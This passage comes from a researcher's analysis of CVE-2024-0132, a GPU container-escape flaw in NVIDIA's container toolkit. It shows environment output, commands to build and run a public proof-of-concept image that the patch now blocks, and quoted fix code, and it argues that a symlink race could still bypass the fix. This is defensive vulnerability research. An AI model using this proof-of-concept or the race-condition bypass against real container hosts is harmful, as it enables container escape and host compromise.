Brand:          Nvidia
GPU UUID:       GPU-86fd03a3-2937-0c87-3dff-26be693ec102
Bus Location:   00000000:00:0d.0
Architecture:   7.5
root@wanglei-gpu:~# 
root@wanglei-gpu:~# docker info
Client:
 Version:    24.0.7
 Context:    default
 Debug Mode: false

Server:
 Containers: 0
  Running: 0
  Paused: 0
  Stopped: 0
 Images: 0
 Server Version: 24.0.7
 Storage Driver: overlay2
  Backing Filesystem: extfs
  Supports d_type: true
  Using metacopy: false
  Native Overlay Diff: true
  userxattr: false
 Logging Driver: json-file
 Cgroup Driver: systemd
 Cgroup Version: 2
 Plugins:
  Volume: local
  Network: bridge host ipvlan macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
 Swarm: inactive
 Runtimes: io.containerd.runc.v2 nvidia runc
 Default Runtime: runc
 Init Binary: docker-init
 containerd version: 
 runc version: 
 init version: 
 Security Options:
  apparmor
  seccomp
   Profile: builtin
  cgroupns
 Kernel Version: 5.15.0-76-generic
 Operating System: Ubuntu 22.04.2 LTS
 OSType: linux
 Architecture: x86_64
 CPUs: 8
 Total Memory: 31.15GiB
 Name: wanglei-gpu
 ID: 611fe373-3040-4a95-96bc-cff83017766f
 Docker Root Dir: /var/lib/docker
 Debug Mode: false
 Experimental: false
 Insecure Registries:
  127.0.0.0/8
 Live Restore Enabled: false
2.2 Verifying the Fix
Using the pre-built PoC image ssst0n3/poc-cve-2024-0132 (or building it on the spot), the same PoC can no longer be exploited.
```
root@wanglei-gpu:~# git clone https://github.com/ssst0n3/poc-cve-2024-0132.git
root@wanglei-gpu:~# cd poc-cve-2024-0132/
root@wanglei-gpu:~/poc-cve-2024-0132# docker build -t ssst0n3/poc-cve-2024-0132 .
root@wanglei-gpu:~/poc-cve-2024-0132# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: error running hook #0: error running hook: exit status 1, stdout: , stderr: Auto-detected mode as 'legacy'
nvidia-container-cli: mount error: unexpected source file mode 120777 for /proc/1/cwd/usr/lib/libnvidia-ml.so.1: unknown.
ERRO[0000] error waiting for container:
```
4. Limitations of the Current Fix
4.1 file_mode_nofollow: Race Condition
file_mode_nofollow handles the symlink case, but it can still be bypassed through a race condition that combines a shared volume with a symlink: the check and the subsequent mount are not atomic, so the path can be swapped in between.
```c
static char **
mount_files(struct error *err, const char *root, const struct nvc_container *cnt,
            const char *dir, char *paths[], size_t size)
{
        ...
        for (size_t i = 0; i < size; ++i) {
                file = basename(paths[i]);
                if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags))
                        continue;
                if (path_append(err, src, paths[i]) < 0)
                        goto fail;
                if (file_mode_nofollow(err, src, &mode) < 0)
                        goto fail;
                // If we encounter resolved directories or symlinks here, we raise an error.
                if (S_ISDIR(mode) || S_ISLNK(mode)) {
                        error_setx(err, "unexpected source file mode %o for %s", mode, paths[i]);
                        goto fail;
                }
                if (path_append(err, dst, file) < 0)
                        goto fail;
                if ((*ptr++ = mount_in_root(err, src, cnt->cfg.rootfs, dst,
                    cnt->uid, cnt->gid, MS_RDONLY|MS_NODEV|MS_NOSUID)) == NULL)
                        goto fail;
                *src_end = '\0';
                *dst_end = '\0';
        }
        ...
}
```
4.2 mount_in_root
mount_in_root is documented to return an error if the destination resolves outside of the rootfs, but in practice that error is only raised when `..` appears in the path; when path components can be symlinks, it appears to offer little protection.
```c
// mount_in_root bind mounts the specified src to the specified location in a root.
// If the destination resolves outside of the root an error is raised.
static char *
mount_in_root(struct error *err, const char *src, const char *rootfs, const char *path,
              uid_t uid, gid_t gid, unsigned long mountflags)
{
        char dst[PATH_MAX];

        if (path_resolve_full(err, dst, rootfs, path) < 0)
                return (NULL);
        return mount_with_flags(err, src, dst, uid, gid, mountflags);
}
```
```c
int
path_resolve_full(struct error *err, char *buf, const char *root, const char *path)
{
        return (do_path_resolve(err, true, buf, root, path));
}

static int
do_path_resolve(struct error *err, bool full, char *buf, const char *root, const char *path)
{
        ...
        while ((file = strsep(&ptr, "/")) != NULL) {
                if (*file == '\0' || str_equal(file, "."))
                        continue;
                else if (str_equal(file, "..")) {
                        /*
                         * Remove the last component from the resolved path. If we are not below
                         * non-existent components, restore the previous file descriptor as well.
                         */
                        if ((p = strrchr(realpath, '/')) == NULL) {
                                error_setx(err, "path error: %s resolves outside of %s", path, root);
                                goto fail;
                        }
                        *p = '\0';
                        if (noents > 0)
                                --noents;
                        else {
                                if ((fd = open_next(err, fd, "..")) < 0)
                                        goto fail;
                        }
                } else {
                        ...
                }
        }
        if (!full) {
                if (path_new(err, buf, realpath) < 0)
                        goto fail;
        } else {
                if (path_join(err, buf, root, realpath) < 0)
                        goto fail;
        }
        rv = 0;
fail:
        xclose(fd);
        return (rv);
}
```
5. Does the Fix Introduce New Vulnerabilities?
No new vulnerabilities were introduced.
10. Vulnerability Discovery Method and Process
1. The Original Authors' Discovery Method
The authors' discovery process is presumed to have been:
1. Given a new container runtime, first focus on its use of the mount system call.

2. Through code audit, discover the CUDA forward-compatibility feature, which mounts from a container path to a container path — and a container path is easily controlled by an attacker.

3. Attempt a symlink attack.
2. Could It Have Been Found Before the Authors or the Industry?
Possibly:

1. With no public details available in the industry, I independently reproduced the vulnerability, demonstrating the necessary capability.

2. In early 2024 I had already planned a vulnerability-hunting project against nvidia-container-runtime, but its priority was low and no actual hunting work had started.
11. Hunting for Similar Issues
12. Vulnerability Intelligence
1. How This Vulnerability Was Learned Of
On September 30, 2024, it was detected through a vulnerability intelligence platform.
2. Could the Vulnerability Have Been Detected Ahead of the Industry?
On September 11, 2024, the fixer, elezar, submitted a PR (libnvidia-container#282) from his personal public repository to the main repository. Monitoring his commit activity could therefore have surfaced the vulnerability ahead of disclosure.
13. Summary
The Wiz security research team has recently focused on AI security; as the first GPU container-escape vulnerability, CVE-2024-0132 is an important piece of AI infrastructure security.
The root cause of this vulnerability is simple and relatively easy to discover, but nvidia-container-toolkit, as a container component supplied by a third party, has historically drawn little attention from researchers; only the recent AI boom has brought it into focus.
During this research, I found that the component's overall code quality is not high and that NVIDIA invests relatively little effort in the project. Further risks in this component merit continued study.
Appendix
Timeline
- 2018-09-14: The developer introduced the vulnerability
- 2024-09-01: Wiz reported the vulnerability to NVIDIA PSIRT
- 2024-09-03: NVIDIA confirmed the vulnerability
- 2024-09-26: NVIDIA released the fixed version
- 2024-09-30: Vulnerability intelligence collected; analysis and emergency response began
- 2024-10-14: With Wiz's details still unpublished, I completed the industry's first reproduction
- 2025-01-06: This article was completed
- 2025-02-13: This article was published on my WeChat official account
References
- https://www.wiz.io/blog/wiz-research-critical-nvidia-ai-vulnerability
- https://nvidia.custhelp.com/app/answers/detail/a_id/5582
This article uses "Vulnerability Research: Vulnerability Analysis and Reproduction" (https://github.com/ssst0n3/security-research-specification) as its document baseline.